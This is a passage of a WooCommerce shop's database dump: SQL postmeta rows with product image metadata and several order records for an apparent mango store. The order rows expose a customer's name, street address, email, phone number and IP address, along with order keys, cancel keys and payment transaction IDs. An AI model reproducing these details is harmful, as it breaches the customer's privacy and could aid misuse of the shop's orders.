6:\"mango_cut-removebg-preview-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:36:\"mango_cut-removebg-preview-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6023,1168,'_wp_attached_file','2022/03/mango_thokku-removebg-preview.png'),(6024,1168,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:41:\"2022/03/mango_thokku-removebg-preview.png\";s:8:\"filesize\";i:85654;s:5:\"sizes\";a:10:{s:21:\"woocommerce_thumbnail\";a:6:{s:4:\"file\";s:41:\"mango_thokku-removebg-preview-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:90367;s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:5:{s:4:\"file\";s:41:\"mango_thokku-removebg-preview-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:11091;}s:18:\"woocommerce_single\";a:5:{s:4:\"file\";s:39:\"mango_thokku-removebg-preview-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:3292;}s:6:\"medium\";a:4:{s:4:\"file\";s:41:\"mango_thokku-removebg-preview-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:41:\"mango_thokku-removebg-preview-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:41:\"mango_thokku-removebg-preview-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:39:\"mango_thokku-removebg-preview-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:41:\"mango_thokku-removebg-preview-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:39:\"mango_thokku-removebg-preview-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:39:\"mango_thokku-removebg-preview-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6117,1187,'_wp_attached_file','2022/03/121.png'),(6118,1187,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:15:\"2022/03/121.png\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"121-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"121-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:15:\"121-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:13:\"121-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:15:\"121-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:15:\"121-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:13:\"121-50x50.png\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:15:\"121-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:13:\"121-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:13:\"121-48x48.png\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6120,1188,'_wp_attached_file','2022/03/images-1.jpg'),(6121,1188,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:500;s:6:\"height\";i:500;s:4:\"file\";s:20:\"2022/03/images-1.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"images-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"images-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"images-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:18:\"images-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"images-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:20:\"images-1-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:18:\"images-1-50x50.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:50;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"images-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:18:\"images-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:18:\"images-1-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(6126,1190,'_wp_attached_file','2022/03/banner-Recovered-01.png'),(6127,1190,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:31:\"2022/03/banner-Recovered-01.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:32:\"banner-Recovered-01-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"banner-Recovered-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-01-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-01-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-01-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-01-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:29:\"banner-Recovered-01-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6129,1192,'_wp_attached_file','2022/03/banner-Recovered-04-1.png'),(6130,1192,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:3834;s:6:\"height\";i:1792;s:4:\"file\";s:33:\"2022/03/banner-Recovered-04-1.png\";s:5:\"sizes\";a:14:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-04-1-300x140.png\";s:5:\"width\";i:300;s:6:\"height\";i:140;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"banner-Recovered-04-1-1024x479.png\";s:5:\"width\";i:1024;s:6:\"height\";i:479;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-04-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-04-1-768x359.png\";s:5:\"width\";i:768;s:6:\"height\";i:359;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"banner-Recovered-04-1-1536x718.png\";s:5:\"width\";i:1536;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"2048x2048\";a:4:{s:4:\"file\";s:34:\"banner-Recovered-04-1-2048x957.png\";s:5:\"width\";i:2048;s:6:\"height\";i:957;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"banner-Recovered-04-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-04-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-04-1-320x320.png\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:9:\"image/png\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-1-50x23.png\";s:5:\"width\";i:50;s:6:\"height\";i:23;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"banner-Recovered-04-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:31:\"banner-Recovered-04-1-48x22.png\";s:5:\"width\";i:48;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(6133,1193,'_wp_attached_file','2022/03/mangoes-2.jpg'),(6134,1193,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:727;s:6:\"height\";i:477;s:4:\"file\";s:21:\"2022/03/mangoes-2.jpg\";s:5:\"sizes\";a:10:{s:6:\"medium\";a:4:{s:4:\"file\";s:21:\"mangoes-2-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:21:\"mangoes-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:21:\"mangoes-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:19:\"mangoes-2-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:21:\"mangoes-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:4:{s:4:\"file\";s:21:\"mangoes-2-320x320.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:11:\"shop_single\";a:4:{s:4:\"file\";s:19:\"mangoes-2-50x33.jpg\";s:5:\"width\";i:50;s:6:\"height\";i:33;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"mangoes-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"thaps-thumb-img\";a:4:{s:4:\"file\";s:19:\"mangoes-2-48x31.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"taiowc-thumb-img\";a:4:{s:4:\"file\";s:19:\"mangoes-2-48x31.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:31;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1646318825\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(6161,1195,'_order_key','wc_order_QLaHo22uB8umu'),(6162,1195,'_customer_user','26'),(6163,1195,'_payment_method','razorpay'),(6164,1195,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(6165,1195,'_customer_ip_address','223.226.34.15'),(6166,1195,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(6167,1195,'_created_via','checkout'),(6168,1195,'_cart_hash','7dd0fda3df44ffe7ed7faf9532e47544'),(6169,1195,'_billing_first_name','bavani'),(6170,1195,'_billing_last_name','p'),(6171,1195,'_billing_address_1','800 ,spandana towers'),(6172,1195,'_billing_address_2','hsr layout'),(6173,1195,'_billing_city','bangalore'),(6174,1195,'_billing_state','KA'),(6175,1195,'_billing_postcode','560102'),(6176,1195,'_billing_country','IN'),(6177,1195,'_billing_email','nijo101196@gmail.com'),(6178,1195,'_billing_phone','9353137538'),(6179,1195,'_shipping_first_name','bavani'),(6180,1195,'_shipping_last_name','p'),(6181,1195,'_shipping_address_1','800 ,spandana towers'),(6182,1195,'_shipping_address_2','hsr layout'),(6183,1195,'_shipping_city','bangalore'),(6184,1195,'_shipping_state','KA'),(6185,1195,'_shipping_postcode','560102'),(6186,1195,'_shipping_country','IN'),(6187,1195,'_order_currency','INR'),(6188,1195,'_cart_discount','0'),(6189,1195,'_cart_discount_tax','0'),(6190,1195,'_order_shipping','40'),(6191,1195,'_order_shipping_tax','0'),(6192,1195,'_order_tax','0'),(6193,1195,'_order_total','235.00'),(6194,1195,'_order_version','6.2.1'),(6195,1195,'_prices_include_tax','no'),(6196,1195,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN nijo101196@gmail.com 9353137538'),(6197,1195,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(6198,1195,'is_vat_exempt','no'),(6199,1195,'_wc_cancel_key','a74bfd8cc01b5fc367299116fc9c00d5'),(6200,1195,'_wcfmmp_order_processed','yes'),(6201,1195,'is_magic_checkout_order','no'),(6202,1195,'_transaction_id','pay_J46CYsdmqkUvx3'),(6203,1195,'_date_paid','1646634262'),(6204,1195,'_paid_date','2022-03-07 11:54:22'),(6205,1195,'_download_permissions_granted','yes'),(6206,1195,'_recorded_sales','yes'),(6207,1195,'_recorded_coupon_usage_counts','yes'),(6208,1195,'_order_stock_reduced','yes'),(6209,1195,'_wcfm_new_order_notified','yes'),(6210,1195,'_wcfm_membership_order_processed','yes'),(6211,1195,'_new_order_email_sent','true'),(6212,1195,'_wcfmmp_order_email_triggered','yes'),(6213,1195,'_date_completed','1646634618'),(6214,1195,'_completed_date','2022-03-07 12:00:18'),(6215,1196,'_order_key','wc_order_r3wM4Rjwr5rWR'),(6216,1196,'_customer_user','1'),(6217,1196,'_payment_method','razorpay'),(6218,1196,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(6219,1196,'_customer_ip_address','223.226.34.15'),(6220,1196,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(6221,1196,'_created_via','checkout'),(6222,1196,'_cart_hash','e8bed02c6689b64781cc568b969bbd9d'),(6223,1196,'_billing_first_name','bavani'),(6224,1196,'_billing_last_name','p'),(6225,1196,'_billing_address_1','800 ,spandana towers'),(6226,1196,'_billing_address_2','hsr layout'),(6227,1196,'_billing_city','bangalore'),(6228,1196,'_billing_state','KA'),(6229,1196,'_billing_postcode','560078'),(6230,1196,'_billing_country','IN'),(6231,1196,'_billing_email','mango@homedirect.in'),(6232,1196,'_billing_phone','123456'),(6233,1196,'_shipping_first_name','bavani'),(6234,1196,'_shipping_last_name','p'),(6235,1196,'_shipping_address_1','800 ,spandana towers'),(6236,1196,'_shipping_address_2','hsr layout'),(6237,1196,'_shipping_city','bangalore'),(6238,1196,'_shipping_state','KA'),(6239,1196,'_shipping_postcode','560102'),(6240,1196,'_shipping_country','IN'),(6241,1196,'_order_currency','INR'),(6242,1196,'_cart_discount','0'),(6243,1196,'_cart_discount_tax','0'),(6244,1196,'_order_shipping','40'),(6245,1196,'_order_shipping_tax','0'),(6246,1196,'_order_tax','0'),(6247,1196,'_order_total','520.00'),(6248,1196,'_order_version','6.2.1'),(6249,1196,'_prices_include_tax','no'),(6250,1196,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN mango@homedirect.in 123456'),(6251,1196,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560102 IN '),(6252,1196,'is_vat_exempt','no'),(6253,1196,'_wc_cancel_key','5bf346da717ebd672a67a471c3f17bfa'),(6254,1196,'_wcfmmp_order_processed','yes'),(6255,1196,'is_magic_checkout_order','no'),(6256,1196,'_transaction_id','pay_J46vmzc8quKMY3'),(6257,1196,'_date_paid','1646636831'),(6258,1196,'_paid_date','2022-03-07 12:37:11'),(6259,1196,'_download_permissions_granted','yes'),(6260,1196,'_recorded_sales','yes'),(6261,1196,'_recorded_coupon_usage_counts','yes'),(6262,1196,'_order_stock_reduced','yes'),(6263,1196,'_wcfm_new_order_notified','yes'),(6264,1196,'_wcfm_membership_order_processed','yes'),(6265,1196,'_new_order_email_sent','true'),(6266,1196,'_wcfmmp_order_email_triggered','yes'),(6267,1197,'_order_key','wc_order_8KWM98KPioFK3'),(6268,1197,'_customer_user','1'),(6269,1197,'_payment_method','razorpay'),(6270,1197,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(6271,1197,'_customer_ip_address','223.226.34.15'),(6272,1197,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(6273,1197,'_created_via','checkout'),(6274,1197,'_cart_hash','62b477a64a4a6fc212f3299a8db1684b'),(6275,1197,'_billing_first_name','bavani'),(6276,1197,'_billing_last_name','p'),(6277,1197,'_billing_address_1','800 ,spandana towers'),(6278,1197,'_billing_address_2','hsr layout'),(6279,1197,'_billing_city','bangalore'),(6280,1197,'_billing_state','KA'),(6281,1197,'_billing_postcode','560078'),(6282,1197,'_billing_country','IN'),(6283,1197,'_billing_email','mango@homedirect.in'),(6284,1197,'_billing_phone','123456'),(6285,1197,'_shipping_first_name','bavani'),(6286,1197,'_shipping_last_name','p'),(6287,1197,'_shipping_address_1','800 ,spandana towers'),(6288,1197,'_shipping_address_2','hsr layout'),(6289,1197,'_shipping_city','bangalore'),(6290,1197,'_shipping_state','KA'),(6291,1197,'_shipping_postcode','560078'),(6292,1197,'_shipping_country','IN'),(6293,1197,'_order_currency','INR'),(6294,1197,'_cart_discount','0'),(6295,1197,'_cart_discount_tax','0'),(6296,1197,'_order_shipping','20'),(6297,1197,'_order_shipping_tax','0'),(6298,1197,'_order_tax','0'),(6299,1197,'_order_total','519.00'),(6300,1197,'_order_version','6.2.1'),(6301,1197,'_prices_include_tax','no'),(6302,1197,'_billing_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN mango@homedirect.in 123456'),(6303,1197,'_shipping_address_index','bavani p  800 ,spandana towers hsr layout bangalore KA 560078 IN '),(6304,1197,'is_vat_exempt','no'),(6305,1197,'_wc_cancel_key','92974a08663a51ccd5a7c643fbf97b93'),(6306,1197,'_wcfmmp_order_processed','yes'),(6307,1197,'is_magic_checkout_order','no'),(6308,1197,'_transaction_id','pay_J477pMZB7ByNwL'),(6309,1197,'_date_paid','1646637515'),(6310,1197,'_paid_date','2022-03-07 12:48:35'),(6311,1197,'_download_permissions_granted','yes'),(6312,1197,'_recorded_sales','yes'),(6313,1197,'_recorded_coupon_usage_counts','yes'),(6314,1197,'_order_stock_reduced','yes'),(6315,1197,'_wcfm_new_order_notified','yes'),(6316,1197,'_wcfm_membership_order_processed','yes'),(6317,1197,'_wcpdf_invoice_settings','a:13:{s:24:\"display_shipping_address\";s:1:\"1\";s:13:\"display_email\";s:1:\"1\";s:13:\"display_phone\";s:1:\"1\";s:12:\"display_date\";s:12:\"invoice_date\";s:14:\"display_number\";s:14:\"invoice_number\";s:11:\"header_logo\";s:3:\"693\";s:18:\"header_logo_height\";s:0:\"\";s:9:\"shop_name\";a:1:{s:7:\"default\";s:10:\"MangoMitra\";}s:12:\"shop_address\";a:1:{s:7:\"default\";s:0:\"\";}s:6:\"footer\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_1\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_2\";a:1:{s:7:\"default\";s:0:\"\";}s:7:\"extra_3\";a:1:{s:7:\"default\";s:0:\"\";}}'),(6318,1197,'_wcpdf_invoice_date','1646637515'),(6319,1197,'_wcpdf_invoice_date_formatted','2022-03-07 12:48:35'),(6320,1197,'_wcpdf_invoice_number','3'),(6321,1197,'_wcpdf_invoice_number_data','a:7:{s:6:\"number\";i:3;s:16:\"formatted_number\";s:1:\"3\";s:6:\"prefix\";N;s:6:\"suffix\";N;s:13:\"document_type\";s:7:\"invoice\";s:8:\"order_id\";i:1197;s:7:\"padding\";N;}'),(6322,1197,'_new_order_email_sent','true'),(6323,1197,'_wcfmmp_order_email_triggered','yes'),(6324,1198,'_order_key','wc_order_dN6vgheS9ZxCW'),(6325,1198,'_customer_user','26'),(6326,1198,'_payment_method','razorpay'),(6327,1198,'_payment_method_title','Credit Card/Debit Card/NetBanking'),(6328,1198,'_customer_ip_address','223.226.34.15'),(6329,1198,'_customer_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36'),(6330,1198,'_created_via','checkout'),(6331,1198,'_cart_hash','f67fa2ff1c97695dcd5e1b519005a14b'),(6332,1198,'_billing_first_name','bavani'),(6333,1198,'_billing_last_name','p'),(6334,1198,'_billing_address_1','800 ,spandana towers'),(6335,1198,'_billing_address_2','hsr 